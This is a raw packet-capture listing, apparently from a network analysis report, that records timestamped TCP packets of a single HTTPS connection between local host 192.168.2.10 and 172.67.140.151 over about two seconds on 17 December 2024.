                                                                                    Dec 17, 2024 08:38:36.891674995 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.897855043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.897872925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.898093939 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.898113012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.899696112 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.905649900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.905674934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.905810118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.905838966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.907991886 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.912806034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.912832022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.912940979 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:36.912966013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:36.913721085 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.054722071 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.054744005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.055035114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.055066109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.059743881 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.061422110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.061444044 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.061537981 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.061554909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.061770916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.068983078 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.069004059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.069066048 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.069082022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.069145918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.069145918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.075382948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.075401068 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.075493097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.075505972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.075575113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.082874060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.082890034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.083149910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.083188057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.083260059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.083930969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.090857983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.090878010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.091007948 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.091007948 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.091020107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.097615004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.097640038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.097807884 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.097807884 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.097817898 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.105123043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.105139971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.105266094 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.105278015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.150814056 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.247303963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.247328043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.247344971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.247354031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.247431993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.247447968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.247473001 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.247494936 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.254612923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.254623890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.254667997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.254708052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.254718065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.254743099 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.254767895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.261059999 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.261080980 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.261136055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.261145115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.261177063 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.261188984 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.268654108 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.268671989 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.268795013 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.268817902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.268847942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.268883944 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.276026964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.276046038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.276092052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.276102066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.276134014 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.276154041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.283118963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.283135891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.283210993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.283222914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.283483028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.290618896 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.290635109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.290683031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.290692091 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.290729046 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.297069073 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.297090054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.297154903 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.297164917 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.297209024 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.440052986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.440087080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.440133095 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.440149069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.440186024 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.447607040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.447634935 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.447688103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.447710991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.447738886 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.447757006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.454933882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.454962015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.455015898 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.455025911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.455061913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.462421894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.462441921 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.462522030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.462533951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.462568998 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.462613106 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.468868971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.468884945 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.468935013 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.468960047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.468986034 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.469006062 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.475984097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.476006031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.476105928 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.476119995 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.476241112 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.483469009 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.483489990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.483560085 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.483572006 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.483616114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.483633995 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.490808010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.490823984 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.490911961 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.490926027 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.490958929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.490978956 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.632622957 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.632654905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.632714033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.632730961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.632769108 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.632786036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.640012026 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.640038967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.640094995 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.640108109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.640139103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.640162945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.647471905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.647505999 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.647564888 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.647579908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.647625923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.653974056 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.654004097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.654063940 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.654074907 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.654125929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.661461115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.661493063 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.661547899 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.661561966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.661601067 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.668462038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.668489933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.668587923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.668587923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.668602943 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.668725967 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.675928116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.675946951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.676016092 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.676029921 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.676069021 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.683451891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.683484077 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.683543921 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.683556080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.683593035 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.683607101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.825233936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.825258017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.825334072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.825351000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.825385094 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.825400114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.831803083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.831819057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.831882954 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.831897020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.831931114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.839267015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.839292049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.839376926 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.839389086 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.839416981 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.846636057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.846653938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.846719980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.846740007 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.846755028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.846775055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.853188992 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.853207111 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.853292942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.853306055 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.853352070 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.861212969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.861238956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.861370087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.861383915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.861464977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.867682934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.867698908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.867755890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.867767096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.867803097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.875330925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.875346899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.875391960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.875402927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:37.875415087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:37.875435114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.016763926 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.016792059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.016841888 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.016856909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.016885996 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.016901970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.024188042 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.024216890 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.024269104 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.024281979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.024312019 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.024332047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.031554937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.031569958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.031665087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.031680107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.031879902 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.038094997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.038110971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.038180113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.038192987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.038561106 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.045599937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.045617104 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.045737982 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.045753956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.045838118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.052596092 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.052613020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.052685022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.052695990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.053004026 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.060059071 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.060075045 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.060139894 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.060152054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.060178041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.060201883 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.067539930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.067555904 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.067640066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.067651033 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.067687988 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.208659887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.208677053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.208738089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.208754063 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.208868980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.208868980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.216149092 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.216166019 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.216294050 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.216305971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.216470003 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.223577976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.223592043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.223683119 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.223700047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.223800898 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.230063915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.230079889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.230179071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.230189085 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.230453968 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.237668037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.237680912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.237950087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.237962961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.238161087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.244576931 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.244597912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.244659901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.244679928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.244749069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.245012999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.251998901 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.252016068 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.252358913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.252368927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.252423048 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.259494066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.259515047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.259689093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.259689093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.259700060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.260005951 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.400950909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.400976896 CET44349713172.67.140.151192.168.2.10
